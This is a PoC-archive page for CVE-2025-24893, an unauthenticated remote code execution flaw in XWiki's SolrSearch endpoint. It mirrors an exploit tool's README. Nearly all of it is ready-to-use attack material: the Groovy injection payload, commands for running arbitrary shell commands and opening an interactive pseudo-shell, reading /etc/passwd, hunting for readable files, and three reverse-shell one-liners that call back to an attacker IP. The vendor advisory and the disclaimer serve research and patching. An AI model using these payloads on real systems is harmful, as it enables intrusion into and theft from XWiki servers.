Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-24893 PoC — Remote code execution as guest via SolrSearchMacros request in xwiki

Source
https://github.com/gotr00t0day/CVE-2025-24893
Associated Vulnerability
Title:Remote code execution as guest via SolrSearchMacros request in xwiki (CVE-2025-24893)
Description:XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Any guest can perform arbitrary remote code execution through a request to `SolrSearch`. This impacts the confidentiality, integrity and availability of the whole XWiki installation. To reproduce on an instance, without being logged in, go to `<host>/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28"Hello%20from"%20%2B%20"%20search%20text%3A"%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20`. If there is an output, and the title of the RSS feed contains `Hello from search text:42`, then the instance is vulnerable. This vulnerability has been patched in XWiki 15.10.11, 16.4.1 and 16.5.0RC1. Users are advised to upgrade. Users unable to upgrade may edit `Main.SolrSearchMacros` in `SolrSearchMacros.xml` on line 955 to match the `rawResponse` macro in `macros.vm#L2824` with a content type of `application/xml`, instead of simply outputting the content of the feed.
Description
Unauthenticated Remote Code Execution in XWiki via SolrSearch Macro
Readme
# XWiki SSTI Exploit

A Python exploit for XWiki Server-Side Template Injection (SSTI) vulnerability via Groovy template injection in the SolrSearch endpoint.

## Vulnerability

- **Type**: Server-Side Template Injection (SSTI)
- **Component**: XWiki SolrSearch RSS feed
- **Impact**: Remote Code Execution
- **Affected Version**: XWiki 15.10.8 (and potentially others)

## Requirements

```bash
pip3 install requests beautifulsoup4
```

## Usage

### Test for Vulnerability
```bash
./xwiki_exploit.py -u http://target --test
```

### Execute Single Command
```bash
./xwiki_exploit.py -u http://target.com -c "whoami"
./xwiki_exploit.py -u http://target.com -c "id"
./xwiki_exploit.py -u http://target.com -c "ls -la /tmp"
```

### Interactive Shell
```bash
./xwiki_exploit.py -u http://target.com
```

This will give you an interactive pseudo-shell where you can run commands:
```
xwiki> whoami
xwiki
xwiki> pwd
/usr/lib/xwiki-jetty
xwiki> ls /home
oliver
xwiki> exit
```

### Debug Mode
```bash
./xwiki_exploit.py -u http://target.com -c "id" --debug
```

### Command-Line Options

- `-u, --url URL`: Target URL (required)
- `-c, --command CMD`: Execute single command
- `--test`: Test if target is vulnerable
- `--no-verify-ssl`: Disable SSL certificate verification
- `--debug`: Enable debug output

## Examples

**Information Gathering:**
```bash
./xwiki_exploit.py -u http://target.com -c "uname -a"
./xwiki_exploit.py -u http://target.com -c "cat /etc/os-release"
./xwiki_exploit.py -u http://target.com -c "cat /etc/passwd"
```

**Find Interesting Files:**
```bash
./xwiki_exploit.py -u http://target.com -c "find /home -type f -readable 2>/dev/null"
./xwiki_exploit.py -u http://target.com -c "ls -la /var/lib/xwiki"
```

**Network Information:**
```bash
./xwiki_exploit.py -u http://target.com -c "ip addr"
./xwiki_exploit.py -u http://target.com -c "netstat -tulpn"
```

**Establish Reverse Shell:**
```bash
# On attacker machine, start listener:
nc -lvnp 1337

# From exploit (try different methods):
./xwiki_exploit.py -u http://target.com -c "bash -c 'bash -i >& /dev/tcp/IP/1337 0>&1'"
./xwiki_exploit.py -u http://target.com -c "nc -e /bin/sh IP 1337"
./xwiki_exploit.py -u http://target.com -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP 1337 >/tmp/f"
```

## Technical Details

### Payload Structure

The exploit uses the following SSTI payload structure:
```
}}}{{async async=false}}{{groovy}}println("COMMAND".execute().text){{/groovy}}{{/async}}
```

### Exploitation Flow

1. The payload is URL-encoded and sent to the vulnerable endpoint:
   ```
   /xwiki/bin/view/Main/SolrSearch?media=rss&text=[PAYLOAD]
   ```

2. The server processes the Groovy template and executes the command

3. The output is captured from the RSS feed response in the format:
   ```
   search on [}}OUTPUT]
   ```

4. The exploit parses the HTML response to extract the command output

## Notes

- Commands are executed as the `xwiki` user (uid=997)
- Working directory is `/usr/lib/xwiki-jetty`
- Some commands may not produce output if they fail or run in the background
- For complex commands, consider using shell scripts or base64 encoding

## Disclaimer

This tool is for educational and authorized penetration testing purposes only. Only use it on systems you have permission to test.
File Snapshot

 [4.0K]  /data/pocs/bbb5cd99cd36d864cfcf5492c8f61547db1fc06e
├── [3.2K]  README.md
└── [7.3K]  xwiki_exploit.py

1 directory, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →